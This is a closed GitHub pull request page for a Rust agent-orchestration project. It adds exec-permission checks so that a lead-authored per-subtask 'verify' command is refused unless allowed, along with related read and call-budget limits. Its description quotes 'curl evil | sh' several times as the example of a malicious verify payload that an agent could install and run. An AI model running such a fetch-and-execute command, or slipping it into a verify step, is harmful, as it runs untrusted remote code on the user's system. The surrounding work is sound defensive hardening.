feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765
Closed
hartsock wants to merge 1 commit into
Closed
feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754)#765hartsock wants to merge 1 commit into
hartsock wants to merge 1 commit into
Conversation
…is (#754) OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This was referenced Jun 29, 2026
Member
Author
hartsock
added a commit
that referenced
this pull request
Jun 29, 2026
…lls, team-verify, clamp grammar (#749) (#781) * feat(ocap): crew.rs enforces fs_read — complete mediation for reads (#752) OCAP enforcement-floor stack (#749, PR 3/8; stacked on #751). The crew CURATE stage read navigator-selected files unconditionally — a clamped fs_read caveat was ignored. Now the navigator's relevant_files are partitioned through caveats.permits_fs_read(path) (mirroring the permits_fs_write partition at crew.rs:348): only readable files are read; denied files are never passed to workspace.read and are surfaced honestly ("N file(s) not readable under your fs_read caveat: ..."), so a clamped read fails visibly. TDD: refuses_to_read_outside_the_fs_read_leash — fs_read=Only([file]); the out-of-scope file is not read, the in-scope one is (red on today's code — both read; green after). just check green (52 newt-scheduler tests, +1). Note: permits_fs_read is exact-string membership (no path-prefix/glob); a prefix-aware fs_read scope is a separate algebra refinement (follow-up). This PR wires the existing predicate. Fixes #752. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): crew enforces max_calls — complete mediation for the call budget (#753) OCAP enforcement-floor stack (#749, PR 4/8; stacked on #759). The crew loop bounded work only by cfg.max_attempts, ignoring caveats.max_calls. Now a calls_used counter consults caveats.max_calls.permits_one_more(used) before each model dispatch (navigate/plan/triage); when the budget denies, the crew stops with an honest NeedsHumanReview cap-exit (never reported as success). The call unit is the model/role dispatch — matching newt-coder's existing call budget. max_calls is now an INDEPENDENT ceiling alongside max_attempts; CountBound::Unlimited (the Caveats::top default) leaves unclamped crews unchanged. net: documented in-code — the crew loop has no direct net effect a permits_net check could gate; net is governed transitively via the exec axis (commands) + an OS sandbox, not a crew-loop predicate (per-axis complete mediation: this axis needs a sandbox, not a call-site). TDD: max_calls_caveat_bounds_total_model_calls (red on today's code — 21 dispatches with max_calls=AtMost(3); green after — 3) + max_calls_zero_denies_even_the_navigator (red — 11; green — 0). RED verified by neutralizing the gates. just check green. Fixes #753. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(ocap): NamedPermissionPreset can clamp fs_read — clamp-grammar fix (#755) OCAP enforcement-floor stack (#749, PR 6/8; stacked on #765). The M6 grammar gap: a preset could not narrow fs_read (to_caveat_profile hardcoded ScopeSpec::default()=All), even though CaveatProfile/Caveats can. NamedPermissionPreset now has an optional fs_read: Option<ScopeSpec> (serde default None => All, so every existing preset is byte-for-byte unchanged); to_caveat_profile lowers it (Some narrows reads). A preset CAN now narrow fs_read when specified. Deferred (documented in-code): valid_for_generation (a causal-window axis, not a preset clamp — follow-up); the default-deny for un-annotated subtasks (an empty clamp is correctly meet-identity; default-deny belongs in step 8's subtask-clamp derivation, not role_profile's general default — flipping it would break back-compat for every preset consumer). TDD: fs_read_clamp_narrows_reads (red on today — fs_read always All; green after) + back-compat (omitted fs_read => All) + config-parse. RED verified by revert. just check green. Mechanical: adding the field required `fs_read: None` in 2 exhaustive struct literals (newt-tui test fixtures); behavior-preserving (consumer literals use ..default()). Fixes #755. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Shawn Hartsock <hartsock@users.noreply.github.com> Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
OCAP enforcement-floor stack — PR 5 of 8 · epic #749
Stacked on step 4 (#760). Review/merge after #760. This completes the core complete-mediation (steps 2–5): the
.meet()seam + enforcement on fs_read, max_calls, and now the team-mode verify. Full order: #749.What this does
The lead-authored per-subtask
verify(team.rs run_team) was installed as the test command with no exec check — a maliciousverify(curl evil | sh) ran ungated (T2 verify-as-payload, design review §3.3). Nowcaveats.permits_exec(verify)gates it beforeset_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it).Test plan
denied_per_subtask_verify_is_refused_not_installed— exec=Only([check-a]); verifycheck-bis NOT installed,check-ais (red on today's code — both installed; green after). RED verified by revert.just checkgreen (6 team tests).Fixes #754. Part of #749. Refs #739, #741.
🤖 Generated with Claude Code